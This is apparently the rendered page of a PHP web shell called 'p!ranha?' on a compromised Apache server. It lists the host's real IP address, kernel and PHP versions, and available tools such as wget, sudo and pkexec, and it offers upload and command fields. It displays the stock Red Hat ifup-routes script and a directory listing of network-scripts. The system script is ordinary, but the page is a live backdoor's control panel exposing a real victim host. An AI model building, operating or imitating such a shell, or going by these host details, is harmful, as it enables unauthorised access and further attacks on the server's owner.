p!ranha?
Server IP : 103.169.32.36  /  Your IP : 216.73.217.108
Web Server : Apache
System : Linux web.dpmptsp 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : apache ( 48)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /etc/sysconfig/network-scripts/

Upload File :
Curr3nt_D!r [ Writeable ] D0cum3nt_r0Ot [ Writeable ]

 
Command :
Current File : /etc/sysconfig/network-scripts/ifup-routes
#! /bin/bash
#
# adds static routes which go through device $1

if [ -z "$1" ]; then
    echo $"usage: ifup-routes <net-device> [<nickname>]"
    exit 1
fi

MATCH='^[[:space:]]*(\#.*)?$'

handle_file () {
    . $1
    routenum=0
    while [ "x$(eval echo '$'ADDRESS$routenum)x" != "xx" ]; do
        eval $(ipcalc -p $(eval echo '$'ADDRESS$routenum) $(eval echo '$'NETMASK$routenum))
        line="$(eval echo '$'ADDRESS$routenum)/$PREFIX"
        if [ "x$(eval echo '$'GATEWAY$routenum)x" != "xx" ]; then
            line="$line via $(eval echo '$'GATEWAY$routenum)"
        fi
        line="$line dev $2"
        /sbin/ip route add $line
        routenum=$(($routenum+1))
    done
}

handle_ip_file() {
    local f t type= file=$1 proto="-4"
    f=${file##*/}
    t=${f%%-*}
    type=${t%%6}
    if [ "$type" != "$t" ]; then
        proto="-6"
    fi
    { cat "$file" ; echo ; } | while read line; do
        if [[ ! "$line" =~ $MATCH ]]; then
            /sbin/ip $proto $type add $line
        fi
    done
}

FILES="/etc/sysconfig/network-scripts/route-$1 /etc/sysconfig/network-scripts/route6-$1"
if [ -n "$2" -a "$2" != "$1" ]; then
    FILES="$FILES /etc/sysconfig/network-scripts/route-$2 /etc/sysconfig/network-scripts/route6-$2"
fi

for file in $FILES; do
    if [ -f "$file" ]; then
        if grep -Eq '^[[:space:]]*ADDRESS[0-9]+=' $file ; then
            # new format
            handle_file $file ${1%:*}
        else
            # older format
            handle_ip_file $file
        fi
    fi
done


# Red Hat network configuration format
NICK=${2:-$1}
CONFIG="/etc/sysconfig/network-scripts/$NICK.route"
[ -f $CONFIG ] && handle_file $CONFIG $1


# Routing rules
FILES="/etc/sysconfig/network-scripts/rule-$1 /etc/sysconfig/network-scripts/rule6-$1"
if [ -n "$2" -a "$2" != "$1" ]; then
    FILES="$FILES /etc/sysconfig/network-scripts/rule-$2 /etc/sysconfig/network-scripts/rule6-$2"
fi

for file in $FILES; do
    if [ -f "$file" ]; then
        handle_ip_file $file
    fi
done
N4m3
5!z3
L45t M0d!f!3d
0wn3r / Gr0up
P3Rm!55!0n5
0pt!0n5
..
--
September 29 2025 07:00:44
0 / 0
0755
ifcfg-eth0
0.403 KB
December 20 2023 04:38:53
0 / 0
0644
ifcfg-lo
0.248 KB
May 22 2020 10:44:33
0 / 0
0644
ifdown
1.612 KB
May 22 2020 10:44:33
0 / 0
0755
ifdown-Team
1.583 KB
December 09 2018 08:57:18
0 / 0
0755
ifdown-TeamPort
1.52 KB
December 09 2018 08:57:18
0 / 0
0755
ifdown-bnep
0.639 KB
May 22 2020 10:44:33
0 / 0
0755
ifdown-eth
6.379 KB
May 22 2020 10:44:33
0 / 0
0755
ifdown-ippp
0.763 KB
May 22 2020 10:44:33
0 / 0
0755
ifdown-ipv6
4.434 KB
May 22 2020 10:44:33
0 / 0
0755
ifdown-isdn
0.763 KB
May 22 2020 10:44:33
0 / 0
0755
ifdown-post
2.08 KB
May 22 2020 10:44:33
0 / 0
0755
ifdown-ppp
1.043 KB
May 22 2020 10:44:33
0 / 0
0755
ifdown-routes
0.85 KB
May 22 2020 10:44:33
0 / 0
0755
ifdown-sit
1.422 KB
May 22 2020 10:44:33
0 / 0
0755
ifdown-tunnel
1.428 KB
May 22 2020 10:44:33
0 / 0
0755
ifup
4.893 KB
May 22 2020 10:44:33
0 / 0
0755
ifup-Team
1.714 KB
December 09 2018 08:57:18
0 / 0
0755
ifup-TeamPort
1.832 KB
December 09 2018 08:57:18
0 / 0
0755
ifup-aliases
12.124 KB
May 22 2020 10:44:33
0 / 0
0755
ifup-bnep
0.889 KB
May 22 2020 10:44:33
0 / 0
0755
ifup-eth
13.436 KB
May 22 2020 10:44:33
0 / 0
0755
ifup-ippp
11.792 KB
May 22 2020 10:44:33
0 / 0
0755
ifup-ipv6
11.614 KB
May 22 2020 10:44:33
0 / 0
0755
ifup-isdn
11.792 KB
May 22 2020 10:44:33
0 / 0
0755
ifup-plip
0.635 KB
May 22 2020 10:44:33
0 / 0
0755
ifup-plusb
1.039 KB
May 22 2020 10:44:33
0 / 0
0755
ifup-post
4.88 KB
May 22 2020 10:44:33
0 / 0
0755
ifup-ppp
4.057 KB
May 22 2020 10:44:33
0 / 0
0755
ifup-routes
1.954 KB
May 22 2020 10:44:33
0 / 0
0755
ifup-sit
3.226 KB
May 22 2020 10:44:33
0 / 0
0755
ifup-tunnel
2.715 KB
May 22 2020 10:44:33
0 / 0
0755
ifup-wireless
1.793 KB
May 22 2020 10:44:33
0 / 0
0755
init.ipv6-global
5.292 KB
May 22 2020 10:44:33
0 / 0
0755
network-functions
20.193 KB
May 22 2020 10:44:33
0 / 0
0644
network-functions-ipv6
30.262 KB
May 22 2020 10:44:33
0 / 0
0644